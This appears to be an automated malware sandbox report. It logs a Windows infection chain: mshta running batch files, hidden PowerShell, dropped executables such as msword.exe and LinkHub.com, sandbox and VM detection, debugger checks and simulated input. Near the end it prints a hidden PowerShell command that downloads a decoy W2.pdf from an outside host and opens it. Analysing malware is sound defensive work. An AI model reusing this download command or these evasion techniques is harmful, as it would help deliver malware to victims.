    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Found API chain indicative of sandbox detection
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_38-103644
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3174Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2739Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3111Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 757Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6816
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1236
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comAPI coverage: 4.0 %
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep count: 3174 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep count: 2739 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7276Thread sleep time: -8301034833169293s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep count: 3111 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep count: 757 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep time: -2767011611056431s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3140Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8620Thread sleep count: 6816 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8624Thread sleep count: 1236 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8660Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8644Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\timeout.exe TID: 8812Thread sleep count: 82 > 30
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com TID: 5236Thread sleep time: -117500s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_004062D5 FindFirstFileW,FindClose,13_2_004062D5
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_00402E18 FindFirstFileW,13_2_00402E18
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,13_2_00406C9B
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CEA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00CEA087
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CEA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00CEA1E2
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CDE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,38_2_00CDE472
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CEA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,38_2_00CEA570
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CE66DC FindFirstFileW,FindNextFileW,FindClose,38_2_00CE66DC
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CAC622 FindFirstFileExW,38_2_00CAC622
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CE73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,38_2_00CE73D4
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CE7333 FindFirstFileW,FindClose,38_2_00CE7333
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CDD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00CDD921
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CDDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00CDDC54
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C75FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,38_2_00C75FC8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\mswordJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\msword\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: mshta.exe, 00000000.00000002.1859438756.000000000A82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1843566389.000000000A828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@S
    Source: mshta.exe, 00000000.00000002.1859438756.000000000A863000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}A
    Source: mshta.exe, 00000000.00000003.1843566389.000000000A857000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1859414539.000000000A820000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1859438756.000000000A857000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CEF4FF BlockInput,38_2_00CEF4FF
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C7338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,38_2_00C7338B
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,13_2_004062FC
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C95058 mov eax, dword ptr fs:[00000030h]38_2_00C95058
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CD20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,38_2_00CD20AA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CA2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00CA2992
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C90BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00C90BAF
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C90D45 SetUnhandledExceptionFilter,38_2_00C90D45
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C90F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_00C90F91
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CD1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,38_2_00CD1B4D
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C7338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,38_2_00C7338B
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CDBBED SendInput,keybd_event,38_2_00CDBBED
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CDECD0 mouse_event,38_2_00CDECD0
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"Jump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"Jump to behavior
